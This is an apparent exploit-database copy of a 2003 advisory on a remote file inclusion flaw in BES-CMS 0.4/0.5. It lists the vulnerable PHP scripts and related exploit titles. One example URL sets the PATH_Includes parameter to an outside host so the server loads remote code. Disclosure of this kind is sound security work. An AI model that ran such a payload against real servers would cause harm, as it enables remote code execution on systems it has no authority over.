source: http://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. BES-CMS versions 0.4 rc3 and 0.5 rc3 are reported to be vulnerable to this issue, however other versions may be affected as well. http://www.example.com/Include/functions_folder.php?PATH_Includes= http://www.example.com/
Related Exploits
Trying to match OSVDBs (1): 3420Other Possible E-DB Search Terms: BES-CMS 0.4/0.5, BES-CMS 0.4, BES-CMS
Date | D | V | Title | Author |
---|---|---|---|---|
2003-12-20 |
![]() |
BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion | frog | |
2003-12-20 |
![]() |
BES-CMS 0.4/0.5 - 'hacking.php' File Inclusion | frog | |
2003-12-20 |
![]() |
BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion | frog | |
2003-12-20 |
![]() |
BES-CMS 0.4/0.5 - 'message.php' File Inclusion | frog | |
2003-12-20 |
![]() |
BES-CMS 0.4/0.5 - 'start.php' File Inclusion | frog |